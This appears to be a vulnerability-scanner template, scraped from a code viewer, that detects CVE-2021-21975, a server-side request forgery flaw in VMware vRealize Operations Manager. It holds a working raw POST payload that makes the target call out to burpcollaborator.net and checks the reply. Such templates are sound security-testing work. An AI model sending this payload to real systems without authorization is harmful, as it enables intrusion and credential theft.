29 lines
848 B
YAML
29 lines
848 B
YAML
|
id: CVE-2021-21975
|
||
|
|
||
|
info:
|
||
|
name: SSRF in vRealize Operations Manager API (VMWare Operations)
|
||
|
author: luci
|
||
|
severity: critical
|
||
|
description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983.
|
||
|
tags: cve,cve2021,ssrf,vmware
|
||
|
reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /casa/nodes/thumbprints HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/json;charset=UTF-8
|
||
|
|
||
|
["burpcollaborator.net"]
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- "Burp Collaborator Server"
|
||
|
part: body
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|